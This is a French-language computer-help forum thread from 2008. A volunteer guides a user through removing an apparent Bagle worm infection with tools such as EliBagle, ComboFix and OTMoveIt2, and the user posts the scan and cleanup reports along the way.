Se connecter / S'enregistrer
Votre question

Ne peut pas démarrer en MSE + installation AntiVir impossible

Tags :
  • Logiciels
  • Sécurité
Dernière réponse : dans Sécurité et virus
20 Juin 2008 16:23:09

Bonjour !

Suite à un sujet que j'ai posté dans "Logiciels" au sujet d'Avast, on m'a gentiment conseillé de venir poster un sujet ici, parce qu'il s'avérerait qu'un bon et charmant virus ait infecté mon ordinateur.

Alors voilà, j'ai tenté d'installer Avast! il y a un mois je dirais, sauf que je n'ai jamais réussi à le faire marcher : Impossible de trouver un fichier ashAvast.exe me dise-t-il. A la suite de ça, j'ai téléchargé les logiciels pour le désinstaller, et installer Antivir comme on me l'a conseillé. Cependant, l'installation ne va pas jusqu'au bout, et se bloque sur un "Close all applications and reboot Windows". J'ai essayé de démarré alors en mode sans échec, mais là y'a un gros soucis, ce mode sans échec rencontre un problème à chaque fois, et m'invite à le redémarré normalement.
Mon ordinateur rame beaucoup, et la barre démarrer par exemple fout le camp au bout de 5 minutes...
Si quelqu'un pouvait m'aider à régler ce problème de virus :( 

Autres pages sur : demarrer mse installation antivir impossible

20 Juin 2008 16:27:52

Bonjour,

Probablement Bagle.

Télécharge Elibagla au bas de cette page.
Il est préférable pour certains antivirus de les désactiver avant d’entâmer cette procédure !

  • Clique sur le Descargar Elibagla afin de télécharger le fichier, enregistre-le sur ton Bureau.
  • Lance le en double cliquant dessus.
  • Vérifie que dans le menu déroulant Unidad, il y ait bien la racine de la racine de la partition où est installé Windows, généralement -> C:\
  • L'option Eliminar Ficheros Automaticamente doit également être cochée.
  • Clique sur Explorar pour lancer l'analyse.
  • Poste le rapport généré en fin fin d'analyse.
    21 Juin 2008 11:12:03

    Merci de répondre aussi rapidement :ouch:  !

    Alors, j'ai bien fait que tu m'as conseillé, et voici le rapport généré en fin d'analyse :

    N° total de Directorios :6801
    N° total de Ficheros : 114 162
    N° de ficheros Analizados : 11 566
    N° de ficheros Infectados : 1
    N° de ficheros Eliminados : 1

    Tiempo Transcurrido (seg) : 512

    Euh, c'est bien ça au moins le rapport généré en fin d'analyse ? :ange: 

    Contenus similaires
    21 Juin 2008 11:44:10

    Il manque du texte mais pas grave.

    Fais un clic droit sur ComboFix (de sUBs) et choisis Enregistrer la cible (du lien) sous.

  • Choisis le Bureau, insère un trait d'union entre Combo et Fix de telle manière à obtenir Combo-Fix.exe, puis choisis Enregistrer.
  • Désactive temporairement toute protection résidente ! (Antivirus, antispywares..)
  • Double clique sur ComboFix.exe.
  • Accepte la licence en cliquant sur Oui.
  • Lorsque l'opération sera terminée, un rapport apparaîtra. Poste ce rapport dans ta prochaine réponse.

    Le rapport se trouve ici : %systemdrive%\ComboFix.txt (%systemdrive% étant la partition où est installée Windows; C:\ en général)

    Aide : Comment utiliser ComboFix.
    21 Juin 2008 13:52:37

    J'ai bien réussi à lancer le logiciel, cependant je ne trouve pas le fichier que tu me demandes :heink: 
    J'ai un dossier Combo-fix dans C:\ mais aucune trace du rapport "ComboFix.txt" :/ 
    21 Juin 2008 14:01:00

    Regarde dans le dossier Combo-Fix ? Sinon ressaie ..
    21 Juin 2008 18:06:40

    Alors, à défaut de ne rien avoir trouver dans le dossier Combo-fix, j'ai cependant trouvé un fichier texte : Bug.txt qui date d'aujourd'hui, à l'heure où j'ai lancé le logiciel.
    Interessant ?
    22 Juin 2008 14:23:30

    Nop,

    Peux-tu repasser Elibagla et me poster le rapport?
    22 Juin 2008 18:49:46


    Sat Jun 21 10:52:26 2008
    EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
    ----------------------------------------------
    Lista de Acciones (por Acción Directa):
    C:\WINDOWS\SYSTEM32\WINTEMS.EXE --> Eliminado Bagle
    C:\WINDOWS\SYSTEM32\BAN_LIST.TXT --> Eliminado Bagle
    C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\HIDIRES\HIDR.EXE --> Eliminado Bagle
    C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\HIDIRES\M_HOOK.SYS --> Eliminado Bagle (rootkit)
    C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\HIDIRES\ROSA.SYS --> Eliminado Bagle (rootkit)
    Por favor, envienos una muestra del fichero
    C:\Muestras\HIDR.EXE.Muestra EliBagle v11.50
    a "virus@satinfo.es". Gracias.
    C:\WINDOWS\SYSTEM32\DRIVERS\HIDR.EXE --> Eliminado Bagle
    Por favor, envienos una muestra del fichero
    C:\Muestras\SROSA.SYS.Muestra EliBagle v11.50
    a "virus@satinfo.es". Gracias.
    C:\WINDOWS\SYSTEM32\DRIVERS\SROSA.SYS --> Eliminado Bagle
    C:\WINDOWS\SYSTEM32\HLDRRR.EXE --> Eliminado Bagle.dldr
    C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\M\FLEC006.EXE --> Eliminado Bagle
    C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\M\LIST.OCT --> Eliminado Bagle
    Eliminada Carpeta "%WinDir%\exefld"
    Restaurada Clave: "SafeBoot\Minimal y Network"

    Sat Jun 21 10:53:31 2008
    EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
    ----------------------------------------------
    Lista de Acciones (por Exploración):
    Explorando Unidad C:\
    C:\Documents and Settings\papounet\Application Data\m\FLEC006.EXE --> Eliminado Bagle.dldr

    Nº Total de Directorios: 6801
    Nº Total de Ficheros: 114162
    Nº de Ficheros Analizados: 11566
    Nº de Ficheros Infectados: 1
    Nº de Ficheros Limpiados: 1

    Sun Jun 22 18:44:16 2008
    EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
    ----------------------------------------------
    Lista de Acciones (por Acción Directa):

    Sun Jun 22 18:44:18 2008
    EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
    ----------------------------------------------
    Lista de Acciones (por Exploración):
    Explorando Unidad C:\
    C:\Documents and Settings\Cindie\Application Data\hidires\HIDR.EXE --> Eliminado Bagle
    C:\Documents and Settings\Cindie\Application Data\hidires\ROSA.SYS --> Eliminado Bagle (rootkit)
    C:\QooBox\Quarantine\C\Documents and Settings\papounet\Application Data\hidires\ROSA.SYS.VIR --> Eliminado Bagle (rootkit)
    C:\QooBox\Quarantine\C\Documents and Settings\papounet\Application Data\m\DATA.OCT.VIR --> Eliminado Bagle.dldr

    Nº Total de Directorios: 6819
    Nº Total de Ficheros: 102197
    Nº de Ficheros Analizados: 11813
    Nº de Ficheros Infectados: 4
    Nº de Ficheros Limpiados: 4
    22 Juin 2008 21:31:18

    Re,

    Redémarre en mode sans échec
    /!\ Ne jamais démarrer en mode sans échec via MSCONFIG /!\

    Supprime (si présents) sur toutes les sessions :

  • C:\Documents and Settings\%username%(le nom d'une session)\Application Data\hidires
  • C:\DOCUMENTS AND SETTINGS\%username%\Application Data\m
    25 Juin 2008 19:19:04

    Bonjour !

    Déjà, excuse moi du retard, j'ai des épreuves orales du bac en ce moment, je n'ai pas eu le temps de m'occuper de mon pc.
    Ensuite, chose extraordinaire, et je n'ai toujours pas compris comment c'est possible : le mode sans échec a fonctionné ! :) 
    Cependant, les fichiers que tu m'as demandé, sont introuvables ... Il faut bien se connecter sur les sessions autres que celle de l'Administrateur ?
    Et sinon, maintenant que le mode sans échec semble fonctionner, est ce que je ne pourrai pas essayer d'installer Antivir ? Je préfère demander avant, on ne sait jamais !
    Merci beaucoup en tout cas :) 
    25 Juin 2008 19:50:44

    Installe-le en mode sans échec avec prise en charge réseau.
    Sinon, avec ça tu vois les dossiers ?

    - Affiche les fichiers cachés : Poste de Travail -> Outils -> Options des dossiers -> Afficher les fichers cachés -> Appliquer, OK.
    - Affiche les fichiers système : Poste de Travail -> Outils -> Options des dossiers -> Afficher les fichers protégés du système d'exploitation -> Appliquer, OK.
    26 Juin 2008 12:33:12

    Réussi !
    En effet, ces fichiers étaient "cachés", je les ai supprimé sur toutes les sessions où je les trouvais. Merci !
    Et maintenant ? :) 
    26 Juin 2008 20:11:53

    Passe une nouvelle fois Elibagla et poste moi son rapport ;) 

    Tu as installé Antivir ? Fait un scan ?
    26 Juin 2008 20:54:45

    Thu Jun 26 20:28:45 2008
    EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
    ----------------------------------------------
    Lista de Acciones (por Acción Directa):

    Thu Jun 26 20:28:48 2008
    EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
    ----------------------------------------------
    Lista de Acciones (por Exploración):
    Explorando Unidad C:\

    Nº Total de Directorios: 6976
    Nº Total de Ficheros: 118900
    Nº de Ficheros Analizados: 11880
    Nº de Ficheros Infectados: 0
    Nº de Ficheros Limpiados: 0


    Je n'ai pas encore installlé Antivir, il m'affichait le message suivant : "close all this applications and reboot Windows" ... Donc je vais essayer en mode sans échec, on ne sait jamais !
    27 Juin 2008 13:15:26

    ça se présente bien, essaie d'installer AntiVir :) 

    Fais un scan complet puis poste le rapport ;) 
    29 Juin 2008 18:33:47

    Euh ... Est ce qu'il faut vraiment que je poste TOUT le scan ? Parce qu'il me faudrait un forum à moi tout seule pour poster toutes les pages je crois :lol: 

    Voici le "compte rendu" fait en mode sans échec, parce qu'en mode normal, impossible de démarrer antivir :( 

    The scan has been done completely.

    7155 Scanning directories
    217761 Files were scanned
    555 viruses and/or unwanted programs were found
    1 Files were classified as suspicious:
    0 files were deleted
    0 files were repaired
    555 files were moved to quarantine
    0 files were renamed
    64 Files cannot be scanned
    217206 Files not concerned
    2037 Archives were scanned
    65 Warnings
    555 Notes

    Ca fait un peu peur le nombre de "viruses and/or unwanted programs"... Et, j'ai tout "mis en quarantaine", c'était la bonne solution ?
    Désolé du retard de la réponse :( 

    [Cependant après le premier scan fait en mode sans échec, Antivir a démarré parfaitement au démarrage normal de Windows, et a trouvé 575 "viruses or/and unwanted programs"... J'ai de l'espoir dans ce pc ! :D  ]
    29 Juin 2008 20:53:02

    Tu peux me l'envoyer en l'hébergeant sur un site et en me donnant le lien ?
    ex : sendspace
    30 Juin 2008 12:32:30

    Il y a d'autres infections.

    Télécharge Lop S&D.exe ( d%u2019 Eric 71 & Angeldark ) sur ton bureau.
  • Double-clique dessus pour lancer l'installation
  • Puis double-clique sur le raccourci Lop S&D présent sur ton bureau
  • Séléctionne la langue souhaitée , puis choisis l'Option 1 ( Recherche )
  • Patiente jusqu'à la fin du scan
  • Poste le rapport généré ( C:\lopR.txt )
    (Si le Bureau ne réapparait pas presse Ctrl + Alt + Suppr , Onglet Fichier , Nouvelle tâche , tape explorer.exe et valide)
    30 Juin 2008 21:58:26

    Re,

    Sélectionne entièrement l'encadré ci-dessous , puis clique droit Copier

    C:\Program Files\vmntoolbar
    C:\Program Files\GamesBar
    C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR
    C:\DOCUME~1\papounet\APPLIC~1\ShopperReports
    C:\DOCUME~1\Laura\APPLIC~1\VMNTOOLBAR
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\settings blue film frag
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\global dead funk does
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar


    Relance Lop S&D

  • Choisis cette fois ci l'Option 4 (LopScript)
  • Une page blanche va s'ouvrir , clique droit dessus et choisis Coller
  • Ferme la page , il te sera demandé de l'enregistrer , clique sur [Enregistrer]
  • Ne ferme pas la fenêtre lors de la suppression !
  • Poste le rapport généré (C:\lopR.txt)
    1 Juillet 2008 11:23:16

    Tu peux les poster directement sur le forum ;)  Quand ce n'est pas trop long.

    Télécharger OTMoveIt2 par OldTimer.

  • Enregistrer ce fichier sur le Bureau.
  • Faire un double clic sur OTMoveIt2.exe pour lancer l'exécution de l'outil. (Note: Si vous utilisez Vista, faire un clic droit sur le fichier puis choisir Exécuter en tant qu'administrateur).
  • Copier les lignes de la zone "Code" ci-dessous en les sélectionnant TOUTES puis en appuyant simultanément sur les touches CTRL et C (ou, après les avoir sélectionnées, en faisant un clic droit puis en choisissant Copier):
    C:\Program Files\GamesBar
    C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR
    C:\DOCUME~1\papounet\APPLIC~1\ShopperReports
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\settings blue film frag
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\global dead funk does
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar

  • Retourner dans la fenêtre de OTMoveIt2, faire un clic droit dans la zone "Paste Standard List of Files/Folders to Move" (sous la barre bleu clair) puis choisir Coller.
  • Cliquer sur le bouton rouge Moveit!.
  • Copier tout ce qui se trouve dans la zone Results (sous la barre verte) en sélectionnant TOUTES LES LIGNES puis en appuyant simultanément sur les touches CTRL et C (ou, après les avoir sélectionnées, en faisant un clic droit puis en choisissant Copier), et coller ces résulats en réponse sur le forum.
  • Fermer OTMoveIt2

    Note: Si un fichier ou un dossier ne peut pas être déplacé immédiatement, un redémarrage sera peut-être nécessaire afin de terminer le processus de déplacement. Si le redémarrage de la machine vous est demandé, choisir Oui/Yes. Dans ce cas, après le redémarrage, ouvrir le Bloc-notes (Démarrer->Tous les programmes->Accessoires->Bloc-notes), cliquer sur Fichier->Ouvrir, dans la zone "Nom du fichier" taper *.log et appuyer sur la touche Entrée, naviguer jusqu'au dossier C:\_OTMoveIt\MovedFiles, puis ouvrir le fichier .log le plus récent; ensuite faire un copier/coller du contenu de ce document en réponse sur le forum.

    Si tu obtiens un message comme quoi le rapport ne peut pas être créé, copie/colle ce qui apparaît dans la colonne droite de l’outil.
    1 Juillet 2008 13:14:15

    Voilà ce que ça donne dans la zone Results :

    C:\Program Files\GamesBar moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR\NewCfg moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR\downfile moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs\res2 moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs\report moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs\dwld moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs\db moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs moved successfully.
    C:\DOCUME~1\papounet\APPLIC~1\ShopperReports moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\report moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\Laura moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\Documents and Settings moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\ShopperReports moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\res2 moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\report moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\Laura moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\dwld moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\Documents and Settings moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\db moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\Application Data moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\Application Data moved successfully.
    C:\DOCUME~1\Laura\APPLIC~1\ShopperReports moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\settings blue film frag moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\global dead funk does moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-21-00-04-32 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-20-22-18-17 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-20-19-23-14 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-19-17-38-31 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-19-17-38-30 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-18-23-28-51 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-16-21-24-48 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-16-11-10-55 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-05-13 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-05-07 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-05-03 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-04-23 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-04-11 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-13-23-49-27 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-10-20-23-54 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-10-19-41-21 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-10-19-41-14 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-10-19-41-13 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-45-24 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-43-31 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-43-18 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-43-16 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-41-11 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-36-32 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-33-34 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-18-05-25 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-02-21-56-52 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-31-14-05-00 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-31-09-41-52 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-52-46 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-52-43 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-46-44 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-33-44 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-33-38 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-33-35 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-28-20-21-32 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-27-21-31-30 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-27-21-31-27 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-27-21-28-29 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-24-18-58-30 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-24-18-58-22 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-18-16-16-03 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-14-19-03-49 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-12-21-34-17 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-12-21-33-49 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-11-23-31-30 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-10-23-15-10 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-02-22-58-40 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-30-22-15-19 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-28-19-05-52 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-26-07-52-21 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-17-22-39-36 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-15-20-07-07 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-14-18-58-36 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-12-10-20-59 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-02-21-09-37 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-30-19-13-49 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-29-10-18-48 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-29-10-18-43 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-29-10-18-36 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-25-12-16-26 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-12-20-00-26 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-11-19-37-15 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-09-13-06-31 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-07-21-27-37 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-03-14-47-03 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-29-22-43-28 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-26-16-53-22 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-26-12-58-11 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-14-18-27-32 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-08-21-11-44 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-07-20-59-09 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-04-20-47-35 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-02-18-00-47 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-01-20-01-38 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-01-28-14-50-53 moved successfully.
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar moved successfully.

    OTMoveIt2 by OldTimer - Version 1.0.4.3 log created on 07012008_131126


    1 Juillet 2008 22:38:24

    Re,

    Peux-tu maintenant relancer ComboFix et me fournir un rapport ?
    2 Juillet 2008 11:02:05

    http://www.sendspace.com/file/nkvw0k

    Hum ... Il y a quand même 221 pages de scan, c'est pas un peu énorme ?
    Par contre, je crois avoir oublier un point essentiel dans ce logiciel :D  Est ce qu'il est primordial d'installer la console de récupération ? Je demande, parce qu'en début de scan il y ait marqué "ATTENTION PAS DE CONSOLE DE RECUPERATION"... Ai-je fait une boulette ?
    2 Juillet 2008 12:49:34

    Oula, c'est parce qu'il n'y avait pas qu'une session d'infectée :) 

    Pour la console, c'est conseillé, mais tu n'es pas obligé.

    Désactive toute protection résidente ( antivirus...) ! <------- Pense-y !

    Copie le texte se situant dans le cadre ci-dessous : ( Ctrl + C )

    Driver::
    pci32

    Filelook::
    C:\Documents and Settings\Laura\Setup.bat

    Collect::
    C:\WINDOWS\system32\nnnOFVPJ.dll
    C:\WINDOWS\BM57dbc21c.xml
    C:\WINDOWS\IFinst26.exe

    Folder::
    C:\_OTMoveIt

    Registry::
    [-HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\nnnOFVPJ]
    [hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
    "{6D794CB4-C7CD-4c6f-BFDC-9B77AFBDC02C}"=-
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "LVCOMSX"=-
    "LogitechVideoRepair"=-
    "LogitechVideoTray"=-
    "NeroFilterCheck"=-
    "QuickTime Task"=-
    "WinampAgent"=-
    "iTunesHelper"=-
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "eMuleAutoStart"=-
    [-HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{6D794CB4-C7CD-4c6f-BFDC-9B77AFBDC02C}]


    => Ouvre le Bloc Notes : Démarrer > Tous les programmes > Accessoires > Bloc notes

    - Colles y le texte (CTRL + V)
    - Enregistre ce fichier dans : Bureau
    - Nom du fichier : CFScript
    - Type du fichier : tous les fichiers !!
    - Clique sur Enregistrer
    - Quitte le Bloc Notes

    Fais un glisser/déposer de ce fichier CFScript sur le fichier ComboFix.exe comme sur la capture :



    * Cela va relancer Combofix : au message qui apparaît ( Type 1 to continue, or 2 to abort), tape 1 puis valide.
    * Patiente le temps du scan. Le bureau va disparaître à plusieurs reprises : c'est normal !
    * Ne touche à rien tant que le scan n'est pas terminé.
    * Une fois le scan achevé, un rapport va s'afficher : Copie/Colle son contenue sur le forum.
    Si le fichier ne s'ouvre pas, il se trouve ici : C:\ComboFix.txt
    * Poste un nouveau rapport hijackthis.
    2 Juillet 2008 14:57:24

    http://www.sendspace.com/file/e6xbf8

    Je ne sais pas si c'est le bon fichier par contre ... il fait 293 pages lui ! Hum ...
    Et y'a un petit soucis : Aucun message n'est apparu quand ComboFix s'est relancé grâce au "glisser/déposer" avec le fichier CFScript ... ComboFix s'est juste lancé comme à son habitude !
    Ensuite, une autre question ( sinon c'est pas drôle... :D ) J'ai bien désactivé Antivir quand j'ai lancé ComboFix, cependant quand ComboFix redémarre Windows, Antivir se réactive... Est ce que ça peut empêcher ComboFix de fonctionner "normalement" ?

    Et ... c'est quoi un rapport hijackthis ? :S
    2 Juillet 2008 15:03:13

    Re,

    On dirait qu'il y a quelque chose qui relance l'infection.

  • Fais un scan en ligne Kaspersky avec Internet Explorer :
  • Clique sur
  • Clique maintenant sur J'accepte.
  • Valide l'installation d'un ou de plusieurs ActiveX si c'est nécessaire.
  • Patiente pendant l'installation des Mises à jour.
  • Choisis par la suite l'analyse du Poste de travail
  • Sauvegarde puis colle le rapport généré en fin d'analyse.

    AIDE : Tuto sur le scan en ligne

    NOTE : Si tu reçois le message "La licence de Kaspersky On-line Scanner est périmée", va dans Ajout/Suppression de programmes puis désinstalle On-Line Scanner, reconnecte toi sur le site de Kaspersky pour retenter le scan en ligne.


    *********

    Télécharge MalwareByte's Anti-Malware sur ton Bureau.
    Installe-le en double-cliquant sur le fichier Download_mbam-setup.exe.

    Une fois l'installation et la mise à jour effectuées, redémarre en mode sans échec.
    AIDE : Redémarrer en mode sans échec

  • Exécute maintenant MalwareByte's Anti-Malware. Si cela n'est pas déjà fait, sélectionne "Exécuter un examen complet".
  • Afin de lancer la recherche, clic sur"Rechercher".
  • Une fois le scan terminé, une fenêtre s'ouvre, clic sur OK. Deux possibilités s'offrent à toi :
    -- si le programme n'a rien trouvé, appuie sur OK. Un rapport va apparaître, ferme-le.
    -- si des infections sont présentes, clic sur "Afficher les résultats" puis sur "Supprimer la sélection". Enregistre le rapport sur ton Bureau afin de le poster dans ta prochaine réponse.
    [#ff0000]REMARQUE : Si MalwareByte's Anti-Malware a besoin de redémarrer pour terminer la suppression, accepte en cliquant sur Ok.[/#f]

    AIDE : Tuto en images sur MBAM
    3 Juillet 2008 23:37:43

    Re,

    Supprime C:\Qoobox

    Télécharger OTMoveIt2 par OldTimer.

  • Enregistrer ce fichier sur le Bureau.
  • Faire un double clic sur OTMoveIt2.exe pour lancer l'exécution de l'outil. (Note: Si vous utilisez Vista, faire un clic droit sur le fichier puis choisir Exécuter en tant qu'administrateur).
